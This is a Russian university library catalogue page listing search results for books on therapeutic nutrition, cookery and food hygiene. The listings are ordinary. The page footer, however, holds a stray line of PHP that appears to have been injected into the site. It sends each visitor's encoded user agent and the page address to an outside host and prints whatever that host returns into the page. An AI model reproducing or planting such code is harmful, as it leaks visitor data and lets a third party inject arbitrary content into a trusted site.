Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

45 пользователей


Зарегистрированных: 1 

Скудин Иван Борисович


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПИТАНИЕ ЛЕЧЕБНОЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 42
1. 
Политика здорового питания [Текст] : Федеральный и региональный уровни, 2002. - 342 с.
Ключевые слова 
ПИТАНИЕ РАЦИОНАЛЬНОЕ -- Питание человека -- ВЕЩЕСТВА пищевые -- ПИЩА -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТ -- Микотоксины -- ПИТАНИЕ - ЗДОРОВЬЕ -- Контроль гигиенический -- ФАЛЬСИФИКАЦИЯ продуктов -- Статус пищевой -- ЗДОРОВЬЕ НАСЕЛЕНИЯ - россия -- микронутриенты -- ВИТАМИНЫ - питание -- КАЛЬЦИЙ - ПИТАНИЕ -- МАГНИЙ - ПИТАНИЕ -- ЖЕЛЕЗО - ПИТАНИЕ -- ЙОД - ПИТАНИЕ -- СЕЛЕН - ПИТАНИЕ -- МИКРОЭЛЕМЕНТЫ - ПИТАНИЕ -- ВОЛОКНО пищевое -- ДЕФИЦИТ витаминный -- ПИЩА - ЭКОЛОГИЯ -- БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ПИТАНИЕ ЗДОРОВОЕ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ШКОЛЬНИКОВ -- РАСТЕНИЯ ТРАНСГЕННЫЕ -- ГЕНЕТИКА РАСТЕНИЙ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- Питание - словарь терминов
Держатели документа (Информация об экземплярах) 
2. 
Голубев В. Н. Пищевые и биологически активные добавки [Текст] : Учеб. для студ. вузов / В. Н. Голубев, Л. В. Чичева-Филатова,Т. В. Шленская, 2003. - 201 с.
Держатели документа (Информация об экземплярах) 
3. 
Покорн Д. Полная энциклопедия лечебного питания [Текст] : энциклопедия / Д. Покорн, 1998. - 574,[1] с.
Ключевые слова 
ПИТАНИЕ ЛЕЧЕБНОЕ -- Гигиена питания -- ПИТАНИЕ ЗДОРОВОЕ -- Питание - здоровье -- Питание сбалансированное -- БЕЛКИ - питание -- СОСТАВ ХИМИЧЕСКИЙ ПРОДУКТОВ -- САХАР - питание -- ЖИРЫ - питание -- ВИТАМИНЫ -- Натрий - питание -- Калий - питание -- Кальций - питание -- Магний - питание -- Фосфор - питание -- Микроэлементы - питание -- Йод - питание -- Фтор - питание -- Железо - питание -- Цинк - питание -- Селен - питание -- Медь - питание -- Хром - питание -- Клетчатка - питание -- ВОДА - питание -- Диета геропрофилактическая -- Диета молочная -- Диета рыбная -- Вегетаринство -- Питание макробиотическое -- Гастрономия -- Питание женщин беременных -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ УЧАЩИХСЯ -- Питание спортсменов -- ПИТАНИЕ ПОЖИЛЫХ ЛЮДЕЙ -- Питание диетотерапевтическое -- ДИЕТА ЛЕЧЕБНАЯ -- КОРМЛЕНИЕ -- ОБМЕН ВЕЩЕСТВ - нарушения -- Диабет сахарный -- Гипогликемия -- Остеопороз -- Диета для похудения -- Анемия -- Аллергия пищевая -- Авитаминоз -- Ожирение -- ПОСТ православный -- Сбор лекарственный -- РАСТЕНИЯ ЦЕЛЕБНЫЕ
Держатели документа (Информация об экземплярах) 
4. 
Шатун Л. Г. Технология приготовления пищи [Текст] : Учеб. / Л. Г. Шатун, 2004. - 479 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- КОНТРОЛЬ КАЧЕСТВА блюд -- Клеймо ветеринарное -- МЕНЮ -- ПИТАНИЕ учащихся -- БАД -- ДОБАВКА ПИЩЕВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ПРОДУКТОВ тепловая -- СУП -- БЛЮДА МЯСНЫЕ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ сои -- Соя -- ПРАВИЛА отпуска блюд -- ПРАВИЛА подачи напитков
Держатели документа (Информация об экземплярах) 
5. 
Лекарства, которые Вы выбираете [Текст] : Справочник, 2001. - 1260 с.
Держатели документа (Информация об экземплярах) 
6. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2002. - 269 с.
Держатели документа (Информация об экземплярах) 
7. 
Богушева В. И. Технология приготовления пищи [Текст] : учеб. для студентов сред. спец. заведений / В. И. Богушева, 2005. - 319 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
8. 
Татарская Л. Л. Лабораторно-практические работы для поваров и кондитеров [Текст] : учеб. пособ. для нач. проф. образования / Л. Л. Татарская, Н. А. Анфимова, 2004. - 108 с.
Держатели документа (Информация об экземплярах) 
9. 
Барановский В. А. Повар [Текст] : учеб. пособие для уч-ся проф. лицеев и училищ / В. А. Барановский, Л. Г. Шатун, 2003. - 383 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- СУП -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ТЕСТО -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
10. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; Под ред. М. А. Николаевой, 2003. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
11. 
Анфимова Н. А. Кулинария [Текст] : Учеб. для учреждений нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 1998. - 324 с.
Держатели документа (Информация об экземплярах) 
12. 
Матюхина З. П. Основы физиологии питания, гигиены и санитарии [Текст] : Учеб. / З. П. Матюхина, 2001. - 181 с.
Держатели документа (Информация об экземплярах) 
13. 
Смолянский, Борис Леонидович. Справочник по лечебному питанию для диетсестер и поваров [Текст] / Б. Л. Смолянский, Ж. И. Абрамова, 1984. - 302, [1] с.
14. 
Завистовска, Зофья. Диетическое питание при различных заболеваниях [Текст] / З. Завистовска, 1992. - 221, [1] с.
Ключевые слова 
ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА ПИТАНИЯ -- ПИТАНИЕ ЗДОРОВОЕ -- БЕЛКИ - ПИТАНИЕ -- УГЛЕВОДЫ - ПИТАНИЕ -- САХАРИДЫ - ПИТАНИЕ -- ЖИРЫ - ПИТАНИЕ -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ - ПИТАНИЕ -- ВОДА - ПИТАНИЕ -- ВИТАМИНЫ- ПИТАНИЕ -- МЕНЮ ДИЕТИЧЕСКОЕ -- ДИЕТА ЛЕЧЕБНАЯ -- ДИЕТА ЛЕГКОУСВОЯЕМАЯ -- БОЛЕЗНЬ ЖЕЛУДКА - ПИТАНИЕ -- БОЛЕЗНЬ КИШЕЧНИКА - ПИТАНИЕ -- БОЛЕЗНЬ ПЕЧЕНИ - ПИТАНИЕ -- ДИАБЕТ САХАРНЫЙ - ПИТАНИЕ -- ОЖИРЕНИЕ - ПИТАНИЕ -- БОЛЕЗНЬ СЕРДЦА - ПИТАНИЕ -- БОЛЕЗНЬ ПОЧЕК - ПИТАНИЕ -- ТЕМПЕРАТУРА ВЫСОКАЯ - ПИТАНИЕ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ КОРМЯЩИХ МАТЕРЕЙ -- СУПЫ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ОВОЩИ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МУЧНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ КРУП - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА ИЗ ЯИЦ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА МЯСНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА РЫБНЫЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- СОУС - ПИТАНИЕ ЛЕЧЕБНОЕ -- БЛЮДА СЛАДКИЕ - ПИТАНИЕ ЛЕЧЕБНОЕ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ ДИЕТИЧЕСКИЕ -- НАПИТКИ - ПИТАНИЕ ЛЕЧЕБНОЕ
15. 
Лабораторно-практические занятия для поваров [Текст] : Учеб. пособие для уч-ся проф. лицеев, уч-щ и колледжей / Авт.-сост. В. А. Коева, 2001. - 220 с.
16. 
Анфимова Н. А. Кулинария [Текст] : Учеб. для учрежд. нач. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 2002. - 324 с.
Держатели документа (Информация об экземплярах) 
17. 
Анфимова Н. А. Кулинария [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Н. А. Анфимова, Л. Л. Татарская, 2002. - 325 с.
18. 
Основы микробиологии, физиологии питания и санитарии для общепита [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования / Авт. сост. Т. П. Трушина, 2000. - 382 с.
Ключевые слова 
БАКТЕРИЯ -- ГРИБЫ плесневые -- ДРОЖЖИ -- ВИРУС -- Фаги -- МИКРООРГАНИЗМ -- Брожение -- ФИЗИОЛОГИЯ питания -- МИКРОФЛОРА -- Пищеварение -- Белки -- Жиры -- Углеводы -- Витамины -- ВЕЩЕСТВА МИНЕРАЛЬНЫЕ -- Обмен веществ -- Режим питания -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ пожилых людей -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ -- ПИТАНИЕ студентов -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ГИГИЕНА общественного питания -- ПРАВИЛА САНИТАРНЫЕ в общепите -- НАДЗОР санитарно-пищевой
19. 
Дубцов Г. Г. Технология приготовления пищи [Текст] : Учеб. пособие для студ. учреждений сред. проф. образования / Г. Г. Дубцов, 2001. - 269 с.
Держатели документа (Информация об экземплярах) 
20. 
Домашняя энциклопедия [Текст] : [В 6 т.]. Т. 1 : Питание- здоровье / Г. И. Молчанов, И. А. Молчанова, М. С. Лукьянчиков, А. Г. Молчанов; Н. Г. Воробьев, 1993. - 478 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3025 - 21.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.67 с.12 запросов, 0.35c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;